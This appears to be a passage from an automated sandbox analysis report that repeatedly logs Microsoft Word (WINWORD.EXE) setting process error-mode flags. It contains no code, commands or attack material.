Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |